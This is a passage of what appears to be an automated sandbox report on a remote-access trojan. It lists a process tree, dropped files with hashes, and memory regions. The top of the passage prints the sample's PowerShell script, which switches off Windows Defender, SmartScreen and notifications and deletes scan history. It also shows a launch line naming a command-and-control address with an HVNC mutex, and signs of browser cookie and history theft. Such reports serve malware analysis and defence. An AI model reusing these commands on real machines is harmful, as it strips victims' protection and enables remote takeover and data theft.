 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 
                                                                              2⤵
                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                              PID:6872
                                                                              • C:\Windows\system32\sc.exe
                                                                                "C:\Windows\system32\sc.exe" qc windefend
                                                                                3⤵
                                                                                • Launches sc.exe
                                                                                PID:4464
                                                                              • C:\Windows\system32\cmd.exe
                                                                                "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                                                                3⤵
                                                                                  PID:6676
                                                                                • C:\Windows\system32\whoami.exe
                                                                                  "C:\Windows\system32\whoami.exe" /groups
                                                                                  3⤵
                                                                                    PID:6580
                                                                                  • C:\Windows\system32\net1.exe
                                                                                    "C:\Windows\system32\net1.exe" start TrustedInstaller
                                                                                    3⤵
                                                                                      PID:6544
                                                                                  • C:\Windows\explorer.exe
                                                                                    "C:\Windows\explorer.exe"
                                                                                    2⤵
                                                                                    • Modifies registry class
                                                                                    PID:1664
                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 127.0.0.1,193.161.193.99 4449 HVNC_MUTEX
                                                                                    2⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:5444
                                                                                • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                  1⤵
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:2768
                                                                                • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                  1⤵
                                                                                  • Modifies Internet Explorer settings
                                                                                  • Modifies registry class
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:4924
                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                  1⤵
                                                                                    PID:4168
                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                    1⤵
                                                                                      PID:4076
                                                                                    • C:\Users\Admin\AppData\Local\Temp\Client.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\Client.exe
                                                                                      1⤵
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:3332
                                                                                    • C:\Windows\servicing\TrustedInstaller.exe
                                                                                      C:\Windows\servicing\TrustedInstaller.exe
                                                                                      1⤵
                                                                                        PID:5388
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
                                                                                          2⤵
                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Modifies data under HKEY_USERS
                                                                                          PID:5116
                                                                                          • C:\Windows\system32\sc.exe
                                                                                            "C:\Windows\system32\sc.exe" qc windefend
                                                                                            3⤵
                                                                                            • Launches sc.exe
                                                                                            PID:4076
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
                                                                                            3⤵
                                                                                              PID:1140
                                                                                            • C:\Windows\system32\whoami.exe
                                                                                              "C:\Windows\system32\whoami.exe" /groups
                                                                                              3⤵
                                                                                                PID:3640
                                                                                              • C:\Windows\system32\net1.exe
                                                                                                "C:\Windows\system32\net1.exe" stop windefend
                                                                                                3⤵
                                                                                                  PID:4036
                                                                                                • C:\Windows\system32\sc.exe
                                                                                                  "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
                                                                                                  3⤵
                                                                                                  • Launches sc.exe
                                                                                                  PID:3876
                                                                                            • C:\Windows\system32\NOTEPAD.EXE
                                                                                              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\UnprotectDisconnect.txt
                                                                                              1⤵
                                                                                              • Opens file in notepad (likely ransom note)
                                                                                              PID:3152
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Client.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\Client.exe
                                                                                              1⤵
                                                                                                PID:2440
                                                                                              • C:\Windows\system32\NOTEPAD.EXE
                                                                                                "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\New Text Document.txt
                                                                                                1⤵
                                                                                                  PID:3588

                                                                                                Network

                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                Replay Monitor

                                                                                                Loading Replay Monitor...

                                                                                                Downloads

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client.exe.log

                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  baf55b95da4a601229647f25dad12878

                                                                                                  SHA1

                                                                                                  abc16954ebfd213733c4493fc1910164d825cac8

                                                                                                  SHA256

                                                                                                  ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924

                                                                                                  SHA512

                                                                                                  24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                  Filesize

                                                                                                  3KB

                                                                                                  MD5

                                                                                                  556084f2c6d459c116a69d6fedcc4105

                                                                                                  SHA1

                                                                                                  633e89b9a1e77942d822d14de6708430a3944dbc

                                                                                                  SHA256

                                                                                                  88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

                                                                                                  SHA512

                                                                                                  0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                  Filesize

                                                                                                  152B

                                                                                                  MD5

                                                                                                  61cef8e38cd95bf003f5fdd1dc37dae1

                                                                                                  SHA1

                                                                                                  11f2f79ecb349344c143eea9a0fed41891a3467f

                                                                                                  SHA256

                                                                                                  ae671613623b4477fbd5daf1fd2d148ae2a09ddcc3804b2b6d4ffcb60b317e3e

                                                                                                  SHA512

                                                                                                  6fb9b333fe0e8fde19fdd0bd01a1990a4e60a87c0a02bc8297da1206e42f8690d06b030308e58c862e9e77714a585eed7cc1627590d99a10aeb77fc0dd3d864d

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                  Filesize

                                                                                                  152B

                                                                                                  MD5

                                                                                                  0a9dc42e4013fc47438e96d24beb8eff

                                                                                                  SHA1

                                                                                                  806ab26d7eae031a58484188a7eb1adab06457fc

                                                                                                  SHA256

                                                                                                  58d66151799526b3fa372552cd99b385415d9e9a119302b99aadc34dd51dd151

                                                                                                  SHA512

                                                                                                  868d6b421ae2501a519595d0c34ddef25b2a98b082c5203da8349035f1f6764ddf183197f1054e7e86a752c71eccbc0649e515b63c55bc18cf5f0592397e258f

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001

                                                                                                  Filesize

                                                                                                  215KB

                                                                                                  MD5

                                                                                                  d79b35ccf8e6af6714eb612714349097

                                                                                                  SHA1

                                                                                                  eb3ccc9ed29830df42f3fd129951cb8b791aaf98

                                                                                                  SHA256

                                                                                                  c8459799169b81fdab64d028a9ebb058ea2d0ad5feb33a11f6a45a54a5ccc365

                                                                                                  SHA512

                                                                                                  f4be1c1e192a700139d7cff5059af81c0234ed5f032796036a1a4879b032ce4eedd16a121bbf776f17bc84a0012846f467ad48b46db4008841c25b779c7d8f5a

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                  Filesize

                                                                                                  120B

                                                                                                  MD5

                                                                                                  5d37318befaff4168b81e7fddf87eefa

                                                                                                  SHA1

                                                                                                  50d26bd00c7bad6137e89cc01c34ca337923305a

                                                                                                  SHA256

                                                                                                  3e4a206034765843f35db411a4d880170e8ceb209fc54c25446327bada8108aa

                                                                                                  SHA512

                                                                                                  4dcad1be65dc417b32bb45e0dcde9275b35f40ae96b491c3b55197a98255f472877ce0074f8cfdded6705b6aaa66234d6b42093a5849dfaa5d16fe588895c0d8

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                  Filesize

                                                                                                  120B

                                                                                                  MD5

                                                                                                  6501eab1e0f9bed1960778e0cf514e2c

                                                                                                  SHA1

                                                                                                  fbada7ba444f4dd91b367b3416d63d8785bbbe45

                                                                                                  SHA256

                                                                                                  f4844522a8f259092d983e64f5d0dfeba4f5128db6e39d2180354610b503874c

                                                                                                  SHA512

                                                                                                  7bd5223bb2d2a7bf8aa0d8d1295fcd55a0a6fa25a34c53729fe24da73c6c2bba77dbf33c1379e1afab78e35b69e982a4e5bf7f779d956f120413657af8d8f341

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

                                                                                                  Filesize

                                                                                                  20KB

                                                                                                  MD5

                                                                                                  9a507254daee01ccb19981c873af7e46

                                                                                                  SHA1

                                                                                                  310ae1ee2410f1ad5d64bea4a9b6b88346da361f

                                                                                                  SHA256

                                                                                                  801a16e38f58fa6016803dddbb32c5a217e6e4bd848213641f0bc04718f2b929

                                                                                                  SHA512

                                                                                                  483a0ed06295ce07c5a12e45a3aad9305074084cf3d6c17373d2fee2af917932537de8839868f81fb8121c88e1760e305ec2735562b9a845097fae969c99356c

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                                                  Filesize

                                                                                                  124KB

                                                                                                  MD5

                                                                                                  97ba2c1c2754ecbff68fbe9e9fd5817b

                                                                                                  SHA1

                                                                                                  3eba96dd30d6a0dbbf93d33e7730aecc1cdaf2dc

                                                                                                  SHA256

                                                                                                  88d1c1f862e02e4893b289d152aeec4bc91ecffd124f7739508642a0de7648c3

                                                                                                  SHA512

                                                                                                  42e533c80175b7e7610768fe70a30a5a6ffa7e405de9a0787b9aa42df67235f5fe791e0020d8f7e6c47dfca74a0ea9af24d73f7bed609b69b8f403486e4eee33

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                  Filesize

                                                                                                  846B

                                                                                                  MD5

                                                                                                  9bfb8744ca35a22d06e43def970c87ce

                                                                                                  SHA1

                                                                                                  81fef17284f4a95df975944d7ad5cfb57ce9af25

                                                                                                  SHA256

                                                                                                  e832e17833644cc91b856f96f1d27e03078b03d1c23fa0c6371551e0abd55bf8

                                                                                                  SHA512

                                                                                                  4a10043921da27371bccd59aa139214822d8b18cace6fb6922d2257f4756eae62730879b62eea67d191ab6292565ee2c4132016de025412dbc2282c1a5b695f9

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                  Filesize

                                                                                                  5KB

                                                                                                  MD5

                                                                                                  2cf8f32e78601d42beb415ce757412d9

                                                                                                  SHA1

                                                                                                  12e66f06ae7d44079a2f5d484e3cb1e941d49143

                                                                                                  SHA256

                                                                                                  1eb57bcf5772b9dc314ac3e0411aae7ead747f54a991c5b70601eaffa0480c04

                                                                                                  SHA512

                                                                                                  1f04ed7f56cff8cac7948ff38b07d7f71377e2ba7e4d46ca6e7fc33008a96903faa9a40dc18799e2f6a3a971f4ca07493799cb72060b986c4cfe207a3d8dad13

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                  Filesize

                                                                                                  6KB

                                                                                                  MD5

                                                                                                  3ea4a691f274eb731aaa6d5d08c644e1

                                                                                                  SHA1

                                                                                                  26d102b47a90b6a31d6572f1bfcde1618dd5f3f8

                                                                                                  SHA256

                                                                                                  ea25500fdd94b470ced626e27d4536800e36cd91ccd88cb9996cc96411edec6b

                                                                                                  SHA512

                                                                                                  377b04c52742aff5a4e7d472830998894c6329e4a5b14595c6e8e43696a54cf8493e23b4e4eab2757881f30b82ac65ea4d6753f8ba704ac23ad3569c0a7f736b

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                  Filesize

                                                                                                  6KB

                                                                                                  MD5

                                                                                                  90a147141eae011f8d1e5af0c6f28a06

                                                                                                  SHA1

                                                                                                  259a57e1a23e9eea2930a394b68f80d93f7cfd98

                                                                                                  SHA256

                                                                                                  34254867521f1119dafd828495a40b04f960411b61a4929523d7ab101085ccee

                                                                                                  SHA512

                                                                                                  29817566169ebb37f29b7774769ef7ea9ad2fbda5fe44eca5f995a872b20451eb05bffca6bb5f231f4e2f020bf2ab768627c33d25460f067c1766c7248aa7b46

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                  Filesize

                                                                                                  16B

                                                                                                  MD5

                                                                                                  6752a1d65b201c13b62ea44016eb221f

                                                                                                  SHA1

                                                                                                  58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                                                                                  SHA256

                                                                                                  0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                                                                                  SHA512

                                                                                                  9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                  Filesize

                                                                                                  10KB

                                                                                                  MD5

                                                                                                  f5f8af939a5cecd80fb1b8a3046fc782

                                                                                                  SHA1

                                                                                                  0ea36ff228293412ad394848b0d80345b2e506ab

                                                                                                  SHA256

                                                                                                  c23553b3cefe323e414746704aa58c371ea9b59b1f3b186e7673bfc4eeaa20a7

                                                                                                  SHA512

                                                                                                  a70bd3886e8b4849c8a2815a79478b9365df9e26a5d9ee092523d240a024c6cd7b5b769686b75811c56a0ad415a962ce376c5c6fa5600ec2fb7c092a150ae622

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                  Filesize

                                                                                                  10KB

                                                                                                  MD5

                                                                                                  a92f35bd1ed9dd2ebc7ceb06517f8b49

                                                                                                  SHA1

                                                                                                  2ca8c61de1e2014eb525fdeccf3cf9fdbc8d091c

                                                                                                  SHA256

                                                                                                  18f12a82cff129620206710627a315a3779fe54f03d8a0ef98ff30fec46ea806

                                                                                                  SHA512

                                                                                                  b34463bf6aa68959003c28d0dd9a0f4cdaf81ccdcdb54bf006a0c49d9ebb4e7e13438890142a55b40a24fc2517629cb65845be481bfd6508d19960ced7367edf

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  d49246229b2077d7961ee5c90e0945f8

                                                                                                  SHA1

                                                                                                  8b50bbdbc82b00f545510bc3ea9e8cd96182fa79

                                                                                                  SHA256

                                                                                                  581ef2752ddb123bff535eebcf573a4783ada1f4b7f7250c4145902a2de5dd8c

                                                                                                  SHA512

                                                                                                  5069555ffc7a217c703186559ed399e5fd8e787443be1d6bf9b6b96faca2565fb1c898422bdde51aadd6359ebf65ae40d4509b2829c5f6bb64d597b3b4763148

                                                                                                • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_ControlPanel

                                                                                                  Filesize

                                                                                                  36KB

                                                                                                  MD5

                                                                                                  fb5f8866e1f4c9c1c7f4d377934ff4b2

                                                                                                  SHA1

                                                                                                  d0a329e387fb7bcba205364938417a67dbb4118a

                                                                                                  SHA256

                                                                                                  1649ec9493be27f76ae7304927d383f8a53dd3e41ea1678bacaff33120ea4170

                                                                                                  SHA512

                                                                                                  0fbe2843dfeab7373cde0643b20c073fdc2fcbefc5ae581fd1656c253dfa94e8bba4d348e95cc40d1e872456ecca894b462860aeac8b92cedb11a7cad634798c

                                                                                                • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\https___java_com_help

                                                                                                  Filesize

                                                                                                  36KB

                                                                                                  MD5

                                                                                                  8aaad0f4eb7d3c65f81c6e6b496ba889

                                                                                                  SHA1

                                                                                                  231237a501b9433c292991e4ec200b25c1589050

                                                                                                  SHA256

                                                                                                  813c66ce7dec4cff9c55fb6f809eab909421e37f69ff30e4acaa502365a32bd1

                                                                                                  SHA512

                                                                                                  1a83ce732dc47853bf6e8f4249054f41b0dea8505cda73433b37dfa16114f27bfed3b4b3ba580aa9d53c3dcc8d48bf571a45f7c0468e6a0f2a227a7e59e17d62

                                                                                                • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133809953868142651.txt

                                                                                                  Filesize

                                                                                                  75KB

                                                                                                  MD5

                                                                                                  580d7f8fa01f2fc90eea589b35ecd227

                                                                                                  SHA1

                                                                                                  cf9457d172ac3b6884f79188ec6e1308bf5d6f86

                                                                                                  SHA256

                                                                                                  e4573971cccf065c9abf262d2e45a1e5941c75165160078ee097012c8f35fcb6

                                                                                                  SHA512

                                                                                                  9a1bc8067caa0cd36728392884c9819858e4976a1af0b7cd0778ead266c0ae5300814314fbefe4fcd42f3a2ff89d03265102602e5758539b59c159c1f6470089

                                                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uf2jhfnb.4z0.ps1

                                                                                                  Filesize

                                                                                                  60B

                                                                                                  MD5

                                                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                                                  SHA1

                                                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                  SHA256

                                                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                  SHA512

                                                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                • C:\Users\Admin\AppData\Local\Temp\places.raw

                                                                                                  Filesize

                                                                                                  5.0MB

                                                                                                  MD5

                                                                                                  6567b8bf6394c215fc0164bdb6be9d49

                                                                                                  SHA1

                                                                                                  361068a8dbe48dd3f79de190a1fa507768970d5e

                                                                                                  SHA256

                                                                                                  5f5f264f10158983fa4ffabe7ee45293176979610d00594d19dccff33cd6f152

                                                                                                  SHA512

                                                                                                  0d2ae07e2b3f31e4cb9cfade4c7ea764d8f0da6042d3c09892720f8339ee32367cf566d9b8484b5adb7fe36d6ecca5d5d8d3c0418f5bcc45f6c437e54f6bd898

                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmpE715.tmp.dat

                                                                                                  Filesize

                                                                                                  114KB

                                                                                                  MD5

                                                                                                  2ba42ee03f1c6909ca8a6575bd08257a

                                                                                                  SHA1

                                                                                                  88b18450a4d9cc88e5f27c8d11c0323f475d1ae6

                                                                                                  SHA256

                                                                                                  a14fb57193e6930fa9e410d9c55dfe98e3ae5e69b22356e621edc73683a581bd

                                                                                                  SHA512

                                                                                                  a1f32c22f0d78cba95c04c432e2a58ea47fb34942e70bfdceffcc2ac1e91b87a3da2cd9f93793427ee09a623c7da700e1c16977d41a44286317e8fc20502f035

                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmpE75A.tmp.dat

                                                                                                  Filesize

                                                                                                  116KB

                                                                                                  MD5

                                                                                                  f70aa3fa04f0536280f872ad17973c3d

                                                                                                  SHA1

                                                                                                  50a7b889329a92de1b272d0ecf5fce87395d3123

                                                                                                  SHA256

                                                                                                  8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

                                                                                                  SHA512

                                                                                                  30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmpF00B.tmp.dat

                                                                                                  Filesize

                                                                                                  40KB

                                                                                                  MD5

                                                                                                  a182561a527f929489bf4b8f74f65cd7

                                                                                                  SHA1

                                                                                                  8cd6866594759711ea1836e86a5b7ca64ee8911f

                                                                                                  SHA256

                                                                                                  42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

                                                                                                  SHA512

                                                                                                  9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

                                                                                                • C:\Users\Admin\AppData\Local\Temp\tmpF00C.tmp.dat

                                                                                                  Filesize

                                                                                                  160KB

                                                                                                  MD5

                                                                                                  f310cf1ff562ae14449e0167a3e1fe46

                                                                                                  SHA1

                                                                                                  85c58afa9049467031c6c2b17f5c12ca73bb2788

                                                                                                  SHA256

                                                                                                  e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855

                                                                                                  SHA512

                                                                                                  1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

                                                                                                • C:\Users\Admin\AppData\Local\c917b216abaf569d685c45bec60a2182\Admin@ZTSLLRFH_en-US\System\Process.txt

                                                                                                  Filesize

                                                                                                  2KB

                                                                                                  MD5

                                                                                                  d1c4e45698b4ba3f67cf12b105793e5b

                                                                                                  SHA1

                                                                                                  01aecc0c7817dcc8deef463a9b3af183f65fe228

                                                                                                  SHA256

                                                                                                  065f41347244709480ae4375320d309d8415237a31711e1d5b1a5dc2df9558d5

                                                                                                  SHA512

                                                                                                  85be0f701e88e0c330e2354ff929f80175f13111f5816a06902143c104d74bf7335d914f3321eb9e13e962a6cfbac50f328e52e0771919346c751de85d279841

                                                                                                • C:\Users\Admin\AppData\Local\c917b216abaf569d685c45bec60a2182\Admin@ZTSLLRFH_en-US\System\Process.txt

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                  MD5

                                                                                                  3ed374dc896ac350f133a1c5cfd5e874

                                                                                                  SHA1

                                                                                                  1053438fa8371874f7090cded468ffb618bde645

                                                                                                  SHA256

                                                                                                  9b8a0c1083c4e38f665bedd39a2ffc7ca75ceebd455e6a0b74a1a32cb06a5ad8

                                                                                                  SHA512

                                                                                                  b60588a62887adc876c67433610e8c834605e3d8e8fd4c6a46a99b383458e06f9df3c457abc2c64eda861aba080fbac107667bf478b23fb1d8e124df6a8b88ce

                                                                                                • C:\Users\Admin\AppData\Local\c917b216abaf569d685c45bec60a2182\msgid.dat

                                                                                                  Filesize

                                                                                                  1B

                                                                                                  MD5

                                                                                                  cfcd208495d565ef66e7dff9f98764da

                                                                                                  SHA1

                                                                                                  b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                                                                  SHA256

                                                                                                  5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                                                                  SHA512

                                                                                                  31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                                                                • C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

                                                                                                  Filesize

                                                                                                  8B

                                                                                                  MD5

                                                                                                  cf759e4c5f14fe3eec41b87ed756cea8

                                                                                                  SHA1

                                                                                                  c27c796bb3c2fac929359563676f4ba1ffada1f5

                                                                                                  SHA256

                                                                                                  c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

                                                                                                  SHA512

                                                                                                  c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

                                                                                                • C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

                                                                                                  Filesize

                                                                                                  7B

                                                                                                  MD5

                                                                                                  bc41fb49b1af319050de60bf64fbfe0e

                                                                                                  SHA1

                                                                                                  047a7782d5247bb5c481984635ccad8750dfbea6

                                                                                                  SHA256

                                                                                                  57d7e8a4f9d97548f96a56cb0cb8cbebe88cffbe3f44264abb4eb522f6ea899a

                                                                                                  SHA512

                                                                                                  5702638642378b3d49617e7ba8e586abdb0f86a79441842af208fb0acb2e532a7c00792f3034d2d01f485931f4adcb532b605763608cb9ff2a12df6d05a57bc7

                                                                                                • memory/748-21-0x00000000028E0000-0x00000000028E1000-memory.dmp

                                                                                                  Filesize

                                                                                                  4KB

                                                                                                • memory/952-20-0x0000000005E80000-0x0000000006424000-memory.dmp

                                                                                                  Filesize

                                                                                                  5.6MB

                                                                                                • memory/952-19-0x0000000005660000-0x00000000056FC000-memory.dmp

                                                                                                  Filesize

                                                                                                  624KB

                                                                                                • memory/952-17-0x0000000000400000-0x0000000000410000-memory.dmp

                                                                                                  Filesize

                                                                                                  64KB

                                                                                                • memory/952-18-0x00000000055C0000-0x0000000005652000-memory.dmp

                                                                                                  Filesize

                                                                                                  584KB

                                                                                                • memory/1652-0-0x00007FF8978D3000-0x00007FF8978D5000-memory.dmp

                                                                                                  Filesize

                                                                                                  8KB

                                                                                                • memory/1652-493-0x000000001B5F0000-0x000000001B5FE000-memory.dmp

                                                                                                  Filesize

                                                                                                  56KB

                                                                                                • memory/1652-794-0x00007FF8978D0000-0x00007FF898391000-memory.dmp

                                                                                                  Filesize

                                                                                                  10.8MB

                                                                                                • memory/1652-16-0x00000000009B0000-0x00000000009CE000-memory.dmp

                                                                                                  Filesize

                                                                                                  120KB

                                                                                                • memory/1652-1-0x0000000000260000-0x0000000000278000-memory.dmp

                                                                                                  Filesize

                                                                                                  96KB

                                                                                                • memory/1652-3-0x00007FF8978D0000-0x00007FF898391000-memory.dmp

                                                                                                  Filesize

                                                                                                  10.8MB

                                                                                                • memory/1652-200-0x0000000002530000-0x000000000253E000-memory.dmp

                                                                                                  Filesize

                                                                                                  56KB

                                                                                                • memory/1652-15-0x0000000000970000-0x0000000000990000-memory.dmp

                                                                                                  Filesize

                                                                                                  128KB

